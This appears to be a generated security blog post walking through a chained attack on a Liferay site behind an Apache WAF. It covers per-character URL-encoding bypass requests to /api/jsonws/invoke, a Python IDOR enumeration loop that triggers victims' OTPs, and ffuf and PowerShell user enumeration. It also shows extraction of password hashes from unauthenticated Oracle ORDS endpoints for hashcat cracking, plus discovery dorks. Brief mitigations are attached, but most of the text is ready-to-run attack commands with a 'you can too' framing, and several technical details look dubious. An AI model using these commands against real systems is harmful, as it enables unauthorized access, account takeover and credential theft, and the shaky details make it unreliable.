How I Bypassed an Apache WAF and Liferay Authentication to Expose an Entire API (And You Can Too) + Video

By /

Listen to this Post

Featured Image

Introduction:

Chaining an unpatched Liferay CVE with a character‑level URL encoding bypass against an Apache Web Application Firewall (WAF) allowed unauthenticated access to a headless administrative API. This attack vector, combined with IDOR vulnerabilities on digital onboarding endpoints and misconfigured Oracle REST Data Services (ORDS) modules, demonstrates how seemingly low‑severity quirks in encoding and access control can lead to full data exposure.

Learning Objectives:

  • Understand how character‑level URL encoding can bypass Apache WAF rules and reach unauthenticated API endpoints.
  • Exploit Insecure Direct Object References (IDOR) to retrieve sensitive user data and live OTP codes.
  • Identify and query unauthenticated Oracle REST Data Services modules exposing password hashes and HR records.

You Should Know:

  1. Chaining Liferay CVE + Apache WAF Encoding Bypass
    The attack chains a known unpatched Liferay CVE (e.g., CVE‑2020‑7961 or similar deserialization/authentication bypass) with a subtle WAF evasion technique. The Apache WAF blocks obvious patterns like ../, ;, or %00, but fails at character‑level URL encoding – where each character of a forbidden payload is individually percent‑encoded.

Step‑by‑step guide:

  1. Identify a Liferay instance behind an Apache WAF (mod_security or similar).
  2. Craft a request to the headless administrative API, e.g., /api/jsonws/invoke.
  3. Encode each character of the sensitive API path using Python: 
    payload = "/api/jsonws/invoke"
encoded = ''.join(f'%{ord(c):02X}' for c in payload)
print(encoded)  %2F%61%70%69%2F%6A%73%6F%6E%77%73%2F%69%6E%76%6F%6B%65

4. Send the request using `curl` on Linux:

curl -i "http://target.com/%2F%61%70%69%2F%6A%73%6F%6E%77%73%2F%69%6E%76%6F%6B%65?method=add-user&userId=1"

5. If the WAF only decodes once, the encoded path remains opaque to regex rules, but Liferay decodes it before routing – granting unauthenticated access.

6. On Windows (PowerShell), test with:

Invoke-WebRequest -Uri "http://target.com/%2F%61%70%69%2F%6A%73%6F%6E%77%73%2F%69%6E%76%6F%6B%65" -Method GET

Mitigation: Normalize URIs before WAF inspection (double decode), and apply strict authentication on all API endpoints regardless of path obfuscation.

2. IDOR on Digital Onboarding Endpoints

An IDOR vulnerability exists when an endpoint accepts a direct reference (e.g., customerId=123) without verifying ownership. In this case, the onboarding endpoint also leaked live OTPs to the attacker’s inbox because the email address was part of the same user object.

Step‑by‑step guide:

  1. Intercept the onboarding request using Burp Suite or OWASP ZAP.

2. Observe a parameter like `customerId=1001`.

  1. Change the value to another number (e.g., 1002) and forward the request.
  2. The response returns the victim’s full name and triggers an OTP email to an attacker‑controlled email address if the endpoint can modify the `email` field.

5. Automate enumeration with a Python script:

import requests
for id in range(1000, 2000):
r = requests.get(f"https://target.com/onboarding/status?customerId={id}", headers={"Authorization": "Bearer <jwt>"})
if "realName" in r.text:
print(f"ID {id}: {r.json()['realName']} - OTP sent to [email protected]")

6. On Windows, use `curl` in a loop:

@echo off
for /l %i in (1000,1,2000) do curl "https://target.com/onboarding/status?customerId=%i"

Mitigation: Implement proper access controls (server‑side) and never expose internal identifiers directly; use UUIDs or opaque tokens.

3. Differential Oracle for Full User Enumeration

The same IDOR endpoint acts as a differential oracle – returning different error messages or HTTP status codes for valid vs. invalid identifiers. This allows an attacker to map the entire user base.

Step‑by‑step guide:

  1. Send two requests: one with a valid `customerId` (HTTP 200 + user data) and one with an invalid ID (HTTP 404 or “not found”).
  2. Use Burp Intruder with a list of potential IDs, filtering by response length or status code.

3. Automate with `ffuf` (Linux):

ffuf -u "https://target.com/onboarding/status?customerId=FUZZ" -w ids.txt -mc 200 -fs 0

4. For Windows, use `Invoke-WebRequest` in PowerShell to measure response size:

1000..2000 | ForEach-Object { $r = Invoke-WebRequest -Uri "https://target.com/onboarding/status?customerId=$_" -Method GET -SkipCertificateCheck; if ($r.Content.Length -gt 100) { Write-Host "Valid ID: $_" } }

Mitigation: Return identical error responses for both valid and invalid identifiers; rate‑limit and log enumeration attempts.

4. Unauthenticated Oracle REST Data Services (ORDS) Exposure

Misconfigured ORDS modules can expose entire database tables via RESTful endpoints without authentication. Here, user password hashes, HR records, and operational data were directly accessible.

Step‑by‑step guide:

  1. Discover exposed ORDS endpoints by fuzzing common paths like /ords/hr/employees, /ords/scott/emp, or /ords//users.

2. Query the endpoint using `curl` (Linux):

curl -i "https://target.com/ords/hr/employees" -H "Accept: application/json"

3. If unauthenticated, it returns a JSON array of employee records including `PASSWORD_HASH` columns.
4. Extract hashes and crack them with `hashcat` (Linux):

curl -s "https://target.com/ords/hr/employees" | jq '.items[].password_hash' > hashes.txt
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt

5. On Windows, use PowerShell to parse JSON and output to file:

$response = Invoke-RestMethod -Uri "https://target.com/ords/hr/employees" -Method GET
$response.items.password_hash | Out-File -FilePath hashes.txt

Mitigation: Enable ORDS authentication (Basic, OAuth2, or custom) and apply least‑privilege database accounts for each REST module.

5. Hardening Against Chained Attacks

To prevent these vulnerabilities from being combined, implement layered defenses:

  • Double‑decode at WAF level – use `mod_security` rule: `SecRule REQUEST_URI “@validateUrlEncoding” “phase:1,id:100,deny”` or Nginx’s `set $decoded_uri $uri;` before inspection.
  • Rate limit IDOR endpoints – using `iptables` (Linux) or `New-NetFirewallRule` (Windows) with dynamic IP blocking.
  • Automated scanning for exposed ORDS – run `sqlmap` against discovered REST endpoints: 
    sqlmap -u "https://target.com/ords/hr/employees?id=1" --dbms=Oracle --level=3
  • Implement API gateways (e.g., Kong, Tyk) with token introspection before requests reach the WAF or Liferay.

6. Exploiting Passive Reconnaissance for ORDS

Attackers often find exposed ORDS modules through Google dorks or Shodan. Use the following dorks to assess your own exposure:

– `intitle:”Oracle REST Data Services” “Welcome”`
– `inurl:”/ords/” “employees”`
– `”/ords/schema” filetype:json`

Internal scanning command (Linux) using `nmap` with HTTP script:

nmap -p 80,443 --script http-ords-enum target.com

Windows equivalent with `Invoke-WebRequest`:

$urls = @("/ords/hr/", "/ords/scott/", "/ords/sys/")
foreach ($u in $urls) { try { $r = Invoke-WebRequest -Uri "https://target.com$u" -Method GET -TimeoutSec 5; if ($r.StatusCode -eq 200) { Write-Host "Exposed: $u" } } catch {} }

What Undercode Say:

  • Chaining is the new critical: Single vulnerabilities are often low‑risk, but chaining an encoding bypass with an unpatched CVE and an IDOR turns a minor issue into full account takeover and data breach.
  • Default configurations kill you: Oracle REST Data Services is secure when locked down, but the default “anyone can query” setting is alarmingly common. Always assume your ORDS modules are exposed until proven otherwise.

Analysis: The three findings above reflect a broader trend: developers trust WAFs and API gateways to handle encoding, ignoring that application servers decode differently. IDORs persist because internal IDs are convenient – but they are also a goldmine for attackers. Meanwhile, ORDS exposure shows that database‑to‑REST automation often bypasses traditional security reviews. Real‑world attacks rarely use one exploit; they weave together misconfigurations, weak access controls, and protocol ambiguities. The only defense is holistic testing that mirrors attacker chain‑building.

Prediction:

As headless APIs and microservices dominate enterprise stacks, encoding bypass attacks will become a standard part of every penetration tester’s toolkit. WAF vendors will respond with mandatory multi‑stage decoding, but legacy systems will remain vulnerable for years. Additionally, IDOR on OTP delivery endpoints will be weaponized in large‑scale SIM‑swap and account takeover campaigns. Finally, exposure of Oracle REST Data Services will decline only when cloud scanners automatically flag unauthenticated ORDS modules as “critical severity” – a shift that is likely within 12–18 months as bug bounty platforms adjust their severity guidelines.

▶️ Related Video (72% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Jeronimovicente New – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Related Posts: